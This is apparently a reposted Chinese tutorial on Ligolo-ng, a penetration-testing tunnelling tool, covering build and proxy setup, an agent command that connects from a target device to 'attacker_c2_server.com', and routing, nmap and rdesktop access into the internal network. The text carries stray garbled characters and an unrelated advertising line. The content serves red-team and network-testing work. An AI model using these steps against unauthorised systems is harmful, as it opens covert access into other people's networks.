關(guān)于Ligolo-ng
Ligolo-ng是一款高級信道工具���,該工具基于TUN接口實(shí)現(xiàn)其功能�。Ligolo-ng是一款輕量級的快速工具�,可以幫助廣大滲透測試人員利用反向TCP/TLS連接建立一條隱蔽的通信信道,而且無需SOCKS支持��。
成都創(chuàng)新互聯(lián)主營內(nèi)丘網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營網(wǎng)站建設(shè)方案,成都app開發(fā),內(nèi)丘h5小程序設(shè)計(jì)搭建,內(nèi)丘網(wǎng)站營銷推廣歡迎內(nèi)丘等地區(qū)企業(yè)咨詢
功能介紹
- Tun接口(不再需要SOCKS);
- 簡單的UI界面���,支持選擇代理和網(wǎng)絡(luò)信息;
- 易于使用����,易于安裝;
- 基于Let’s Encrypt的自動(dòng)化證書配置;
- 高性能(多路復(fù)用);
- 不需要高級權(quán)限;
- 套接字監(jiān)聽/代理綁定;
- 多平臺(tái)代理支持;
工具構(gòu)建
(1) 構(gòu)建Ligolo-ng
- $ go build -o agent cmd/agent/main.go
- $ go build -o proxy cmd/proxy/main.go
- # Build agent for Windows
- $ GOOS=windows go build -o agent.exe cmd/agent/main.go
(2) 安裝Ligolo-ng
我們需要在自己的命令控制服務(wù)器上開啟代理服務(wù)�����,默認(rèn)使用11601端口監(jiān)聽:
- $ sudo ip tuntap add user [your_username] mode tun ligolo
- $ sudo ip link set ligolo up
- $ ./proxy -h # Help options
- $ ./proxy -autocert # Automatically request LetsEncrypt certificates
工具使用
首先�����,我們需要在目標(biāo)設(shè)備上啟動(dòng)代理(無需特殊權(quán)限):
- $ ./agent -connect attacker_c2_server.com:11601
此時(shí)����,代理服務(wù)器上將出現(xiàn)一條會(huì)話鏈接:
- INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
使用“session”命令選擇代理:
- ligolo-ng ? session
-
- ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
使用“ifconfig”命令顯示代理的網(wǎng)絡(luò)配置信息:
- [Agent : nchatelain@nworkstation] ? ifconfig
-
- [...]
-
- ┌─────────────────────────────────────────────┐
-
- │ Interface 3 │
-
- ├──────────────┬──────────────────────────────┤
-
- │ Name │ wlp3s0 │
-
- │ Hardware MAC │ de:ad:be:ef:ca:fe │
-
- │ MTU │ 1500 │
-
- │ Flags │ up|broadcast|multicast │
-
- │ IPv4 Address │ 192.168.0.30/24 │
-
- └──────────────┴──────────────────────────────┘
在代理/中繼服務(wù)器上添加一條指向192.168.0.0/24代理網(wǎng)絡(luò)的路由:
- $ sudo ip route add 192.168.0.0/24 dev ligolo
最后,在代理上開啟一條通信信道:
- [Agent : nchatelain@nworkstation] ? start
-
- [Agent : nchatelain@nworkstation] ? INFO[0690] Starting tunnel to nchatelain@nworkstation
現(xiàn)在���,你就可以通過代理服務(wù)器訪問192.168.0.0/24代理網(wǎng)絡(luò):
- $ nmap 192.168.0.0/24 -v -sV -n
-
- [...]
-
- $ rdesktop 192.168.0.123
-
- [...]
支持的協(xié)議/數(shù)據(jù)包
性能
在Ligolo-ng的幫助下�����,你可以輕松達(dá)到100 Mbits/秒的速度�。下面給出的測試結(jié)果是在一臺(tái)200Mbits/s服務(wù)器上使用iperf測試的一條200Mbits/s的鏈接:
- $ iperf3 -c 10.10.0.1 -p 24483
-
- Connecting to host 10.10.0.1, port 24483
-
- [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
-
- [ ID] Interval Transfer Bitrate Retr Cwnd
-
- [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
-
- [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
-
- [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
-
- [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
-
- [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
-
- [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
-
- [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
-
- [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
-
- [ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
-
- [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
-
- - - - - - - - - - - - - - - - - - - - - - - - - -
-
- [ ID] Interval Transfer Bitrate Retr
-
- [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
-
- [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
注意事項(xiàng)
由于代理并不是以高級權(quán)限運(yùn)行的�,因此無法轉(zhuǎn)發(fā)原始數(shù)據(jù)包。當(dāng)你執(zhí)行“NMAP SYN-SCAN”的時(shí)候���,代理上會(huì)執(zhí)行一次TCP connect()���。
在使用Nmap時(shí),你應(yīng)該使用“--unprivileged”或“-PE”以避免假陽性�����。
工具使用演示
視頻地址:【點(diǎn)我觀看】
項(xiàng)目地址
Ligolo-ng:【GitHub傳送門】
網(wǎng)站名稱:如何使用Ligolo-ng建立隱蔽的通信信道
鏈接地址:
http://uogjgqi.cn/article/coggeoj.html
